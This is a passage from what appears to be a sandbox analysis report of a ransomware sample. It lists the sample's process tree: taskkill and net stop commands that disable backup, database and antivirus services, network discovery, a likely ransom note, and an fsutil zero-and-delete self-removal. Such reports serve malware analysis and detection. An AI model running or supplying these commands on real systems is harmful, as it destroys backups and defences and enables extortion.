PID:8904

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8896

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8880

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8872

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8856

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8840

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8832

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8816

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
3⤵
- Kills process with taskkill
PID:8808

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8792

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8784

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8768

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8760

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8744

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8728

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8720

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8712

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8696

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8688

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8672

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8664

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8648

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8640

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8624

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8616

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8600

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8396

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
3⤵
PID:7096

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
3⤵
PID:7088

C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
3⤵
PID:7080

C:\Windows\SysWOW64\net.exe
"net.exe" stop veeam /y
3⤵
PID:7072

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
3⤵
PID:7064

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
3⤵
PID:7056

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
3⤵
PID:7048

C:\Windows\SysWOW64\net.exe
"net.exe" stop VSNAPVSS /y
3⤵
PID:7036

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Health Service” /y
3⤵
PID:6964

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSRS /y
3⤵
PID:6956

C:\Windows\SysWOW64\net.exe
"net.exe" stop W3Svc /y
3⤵
PID:6948

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SYSTEM_BGC /y
3⤵
PID:6940

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Veeam Backup Catalog Data Service” /y
3⤵
PID:6924

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPS /y
3⤵
PID:6916

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos File Scanner Service” /y
3⤵
PID:6908

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSA /y
3⤵
PID:6900

C:\Windows\SysWOW64\net.exe
"net.exe" stop UI0Detect /y
3⤵
PID:6884

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SQL_2008 /y
3⤵
PID:6876

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Symantec System Recovery” /y
3⤵
PID:6868

C:\Windows\SysWOW64\net.exe
"net.exe" stop mozyprobackup /y
3⤵
PID:6848

C:\Windows\SysWOW64\net.exe
"net.exe" stop ekrn /y
3⤵
PID:6840

C:\Windows\SysWOW64\net.exe
"net.exe" stop DCAgent /y
3⤵
PID:6756

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SHAREPOINT /y
3⤵
PID:6748

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
3⤵
PID:6740

C:\Windows\SysWOW64\net.exe
"net.exe" stop AVP /y
3⤵
PID:6724

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /y
3⤵
PID:6716

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SBSMONITORING /
3⤵
PID:6708

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
3⤵
PID:6700

C:\Windows\SysWOW64\net.exe
"net.exe" stop Antivirus /y
3⤵
PID:6692

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROFXENGAGEMENT /y
3⤵
PID:6676

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
3⤵
PID:6668

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
3⤵
PID:6660

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROD /y
3⤵
PID:6652

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
3⤵
PID:6636

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Web Control Service” /y
3⤵
PID:6628

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTTICEBGC /y
3⤵
PID:6620

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDeviceMediaService /y
3⤵
PID:6612

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos System Protection Service” /y
3⤵
PID:6604

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTICEMGT /y
3⤵
PID:6588

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
3⤵
PID:6580

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Safestore Service” /y
3⤵
PID:6572

C:\Windows\SysWOW64\net.exe
"net.exe" stop audioendpointbuilder /y
3⤵
PID:6564

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$ECWDB2 /y
3⤵
PID:6548

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
3⤵
PID:6540

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Message Router” /y
3⤵
PID:6532

C:\Windows\SysWOW64\net.exe
"net.exe" stop unistoresvc_1af40a /y
3⤵
PID:6524

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$BKUPEXEC /y
3⤵
PID:6516

C:\Windows\SysWOW64\net.exe
"net.exe" stop ARSM /y
3⤵
PID:6500

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Client” /y
3⤵
PID:6492

C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeimap4 /y
3⤵
PID:6484

C:\Windows\SysWOW64\net.exe
"net.exe" stop “intel(r) proset monitoring service” /y
3⤵
PID:6476

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPSAMA /y
3⤵
PID:6460

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
3⤵
PID:6452

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Agent” /y
3⤵
PID:6444

C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeadtopology /y
3⤵
PID:6436

C:\Windows\SysWOW64\net.exe
"net.exe" stop “aphidmonitorservice” /y
3⤵
PID:6420

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPS /y
3⤵
PID:6412

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Zoolz 2 Service” /y
3⤵
PID:6404

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPSAMA /y
3⤵
PID:6396

C:\Windows\SysWOW64\net.exe
"net.exe" stop vapiendpoint /y
3⤵
PID:6388

C:\Windows\SysWOW64\net.exe
"net.exe" stop mssql$vim_sqlexp /y
3⤵
PID:6372

C:\Windows\SysWOW64\net.exe
"net.exe" stop WRSVC /y
3⤵
PID:6364

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY$ECWDB2 /y
3⤵
PID:6356

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyServiceHelper /y
3⤵
PID:6348

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY /y
3⤵
PID:6332

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyScheduler /y
3⤵
PID:6324

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSERVERAGENT /y
3⤵
PID:6316

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKey /y
3⤵
PID:6308

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSafeOLRService /y
3⤵
PID:6292

C:\Windows\SysWOW64\net.exe
"net.exe" stop tmlisten /y
3⤵
PID:6284

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLBrowser /y
3⤵
PID:6276

C:\Windows\SysWOW64\net.exe
"net.exe" stop TmCCSF /y
3⤵
PID:6268

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2012 /y
3⤵
PID:6260

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update_64 /y
3⤵
PID:6244

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:6236

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update /y
3⤵
PID:6228

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPSAMA /y
3⤵
PID:6220

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_service /y
3⤵
PID:6204

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPS /y
3⤵
PID:6196

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_filter /y
3⤵
PID:6188

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SYSTEM_BGC /y
3⤵
PID:6172

C:\Windows\SysWOW64\net.exe
"net.exe" stop svcGenericHost /y
3⤵
PID:6164

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQLEXPRESS /y
3⤵
PID:6156

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SOPHOS /y
3⤵
PID:6148

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SQL_2008 /y
3⤵
PID:1964

C:\Windows\SysWOW64\net.exe
"net.exe" stop sophossps /y
3⤵
PID:6140

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SHAREPOINT /y
3⤵
PID:6132

C:\Windows\SysWOW64\net.exe
"net.exe" stop SntpService /y
3⤵
PID:6124

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SBSMONITORING /y
3⤵
PID:6116

C:\Windows\SysWOW64\net.exe
"net.exe" stop SmcService /y
3⤵
PID:6100

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROFXENGAGEMENT /y
3⤵
PID:6092

C:\Windows\SysWOW64\net.exe
"net.exe" stop Smcinst /y
3⤵
PID:6084

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PROD /y
3⤵
PID:6076

C:\Windows\SysWOW64\net.exe
"net.exe" stop ShMonitor /y
3⤵
PID:6060

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEMGT /y
3⤵
PID:6052

C:\Windows\SysWOW64\net.exe
"net.exe" stop SepMasterService /y
3⤵
PID:6044

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$PRACTTICEBGC /y
3⤵
PID:6036

C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVService /y
3⤵
PID:6028

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$ECWDB2 /y
3⤵
PID:6020

C:\Windows\SysWOW64\net.exe
"net.exe" stop SAVAdminService /y
3⤵
PID:6012

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CXDB /y
3⤵
PID:6004

C:\Windows\SysWOW64\net.exe
"net.exe" stop sacsvr /y
3⤵
PID:5996

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$CITRIX_METAFRAME /y
3⤵
PID:5980

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SOPHOS /y
3⤵
PID:5972

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$BKUPEXEC /y
3⤵
PID:5964

C:\Windows\SysWOW64\net.exe
"net.exe" stop sms_site_sql_backup /y
3⤵
PID:5948

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfevtp /y
3⤵
PID:5940

C:\Windows\SysWOW64\net.exe
"net.exe" stop RESvc /y
3⤵
PID:5932

C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
3⤵
PID:5924

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfemms /y
3⤵
PID:5916

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
3⤵
PID:5900

C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
3⤵
PID:5892

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfefire /y
3⤵
PID:5884

C:\Windows\SysWOW64\net.exe
"net.exe" stop OracleClientCache80 /y
3⤵
PID:5876

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
3⤵
PID:5868

C:\Windows\SysWOW64\net.exe
"net.exe" stop McTaskManager /y
3⤵
PID:5852

C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL80 /y
3⤵
PID:5844

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamRESTSvc /y
3⤵
PID:5836

C:\Windows\SysWOW64\net.exe
"net.exe" stop McShield /y
3⤵
PID:5828

C:\Windows\SysWOW64\net.exe
"net.exe" stop MySQL57 /y
3⤵
PID:5812

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
3⤵
PID:5804

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFrameworkMcAfeeFramework /y
3⤵
PID:5796

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerOLAPService /y
3⤵
PID:5788

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamMountSvc /y
3⤵
PID:5772

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFramework /y
3⤵
PID:5764

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper100 /y
3⤵
PID:5756

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamHvIntegrationSvc /y
3⤵
PID:5748

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeEngineService /y
3⤵
PID:5740

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper /y
3⤵
PID:5724

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamEnterpriseManagerSvc /y
3⤵
PID:5716

C:\Windows\SysWOW64\net.exe
"net.exe" stop MBEndpointAgent /y
3⤵
PID:5708

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLSERVER /y
3⤵
PID:5700

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploySvc /y
3⤵
PID:5684

C:\Windows\SysWOW64\net.exe
"net.exe" stop MBAMService /y
3⤵
PID:5676

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPSAMA /y
3⤵
PID:5668

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
3⤵
PID:5660

C:\Windows\SysWOW64\net.exe
"net.exe" stop masvc /y
3⤵
PID:5652

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPS /y
3⤵
PID:5636

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCloudSvc /y
3⤵
PID:5628

C:\Windows\SysWOW64\net.exe
"net.exe" stop macmnsvc /y
3⤵
PID:5620

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
3⤵
PID:5612

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCatalogSvc /y
3⤵
PID:5604

C:\Windows\SysWOW64\net.exe
"net.exe" stop klnagent /y
3⤵
PID:5596

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SQL_2008 /y
3⤵
PID:5588

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBrokerSvc /y
3⤵
PID:5572

C:\Windows\SysWOW64\net.exe
"net.exe" stop kavfsslp /y
3⤵
PID:5564

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
3⤵
PID:5556

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBackupSvc /y
3⤵
PID:5548

C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFSGT /y
3⤵
PID:5540

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
3⤵
PID:5524

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLWriter /y
3⤵
PID:5516

C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFS /y
3⤵
PID:5508

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
3⤵
PID:5500

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:5492

C:\Windows\SysWOW64\net.exe
"net.exe" stop FA_Scheduler /y
3⤵
PID:5476

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2012 /y
3⤵
PID:5468

C:\Windows\SysWOW64\net.exe
"net.exe" stop SDRSVC /y
3⤵
PID:5460

C:\Windows\SysWOW64\net.exe
"net.exe" stop ESHASRV /y
3⤵
PID:5452

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
3⤵
PID:5444

C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
3⤵
PID:5436

C:\Windows\SysWOW64\net.exe
"net.exe" stop EsgShKernel /y
3⤵
PID:5428

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPSAMA /y
3⤵
PID:5420

C:\Windows\SysWOW64\net.exe
"net.exe" stop ntrtscan /y
3⤵
PID:5412

C:\Windows\SysWOW64\net.exe
"net.exe" stop EPUpdateService /y
3⤵
PID:5404

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPS /y
3⤵
PID:5396

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
3⤵
PID:5388

C:\Windows\SysWOW64\net.exe
"net.exe" stop EPSecurityService /y
3⤵
PID:5380

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SYSTEM_BGC /y
3⤵
PID:5372

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SYSTEM_BGC /y
3⤵
PID:5360

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Device Control Service” /y
3⤵
PID:5352

C:\Windows\SysWOW64\net.exe
"net.exe" stop SstpSvc /y
3⤵
PID:5332

C:\Windows\SysWOW64\net.exe
"net.exe" stop msftesql$PROD /y
3⤵
PID:5316

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Filter Service” /y
3⤵
PID:5308

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
3⤵
PID:5300

C:\Windows\SysWOW64\net.exe
"net.exe" stop SMTPSvc /y
3⤵
PID:5292

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Clean Service” /y
3⤵
PID:5284

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMGMT /y
3⤵
PID:5276

C:\Windows\SysWOW64\net.exe
"net.exe" stop POP3Svc /y
3⤵
PID:5268

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer110 /y
3⤵
PID:5260

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Backup Service” /y
3⤵
PID:5252

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer /y
3⤵
PID:5244

C:\Windows\SysWOW64\net.exe
"net.exe" stop SamSs /y
3⤵
PID:5236

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos AutoUpdate Service” /y
3⤵
PID:5228

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeIS /y
3⤵
PID:5220

C:\Windows\SysWOW64\net.exe
"net.exe" stop NetMsmqActivator /y
3⤵
PID:5212

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer100 /y
3⤵
PID:5204

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQL Backups /y
3⤵
PID:5196

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Enterprise Client Service” /y
3⤵
PID:5188

C:\Windows\SysWOW64\net.exe
"net.exe" stop EraserSvc11710 /y
3⤵
PID:5180

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Agent” /y
3⤵
PID:5172

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeES /y
3⤵
PID:5164

C:\Windows\SysWOW64\net.exe
"net.exe" stop IISAdmin /y
3⤵
PID:5156

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer /y
3⤵
PID:5148

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Acronis VSS Provider” /y
3⤵
PID:5140

C:\Windows\SysWOW64\net.exe
"net.exe" stop sophos /y
3⤵
PID:5132

C:\Windows\SysWOW64\net.exe
"net.exe" stop CAARCUpdateSvc /y
3⤵
PID:5124

C:\Windows\SysWOW64\net.exe
"net.exe" stop CASAD2DWebSvc /y
3⤵
PID:1576

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
3⤵
PID:1336

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
3⤵
PID:4164

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
3⤵
PID:4128

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
3⤵
PID:4432

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
3⤵
PID:1056

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
3⤵
PID:4464

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
3⤵
PID:3416

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBIDPService /y
3⤵
PID:5056

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBFCService /y
3⤵
PID:492

C:\Windows\SysWOW64\net.exe
"net.exe" stop RTVscan /y
3⤵
PID:4092

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c net view
3⤵
PID:4784

C:\Windows\SysWOW64\net.exe
"net.exe" stop DefWatch /y
3⤵
PID:4916

C:\Windows\SysWOW64\net.exe
"net.exe" stop YooIT /y
3⤵
PID:4812

C:\Windows\SysWOW64\net.exe
"net.exe" stop YooBackup /y
3⤵
PID:4732

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBCFMonitorService /y
3⤵
PID:4688

C:\Windows\SysWOW64\net.exe
"net.exe" stop BMR Boot Service /y
3⤵
PID:4452

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.64
3⤵
PID:5312

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
3⤵
- Opens file in notepad (likely ransom note)
PID:9656

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
3⤵
PID:8144

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
4⤵
- Runs ping.exe
PID:4384

C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
4⤵
PID:9836

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe
3⤵
PID:12272

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
4⤵
PID:13100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
1⤵
PID:3976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
1⤵
PID:4624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooIT /y
1⤵
PID:4236

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
1⤵
PID:2476

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
PID:3184

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
1⤵
PID:4948

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:11996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
1⤵
PID:11988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
1⤵
PID:12140

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
1⤵
PID:11980

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
1⤵
PID:11972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:11796

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
1⤵
PID:11788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:7372

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
1⤵
PID:12560

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
1⤵
PID:13344

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SntpService /y
1⤵
PID:14172

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:14148

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
1⤵
PID:14140

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
1⤵
PID:14132

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update /y
1⤵
PID:14124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
1⤵
PID:14116

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
1⤵
PID:14108

C:\Windows\SysWOW64\net1.exe
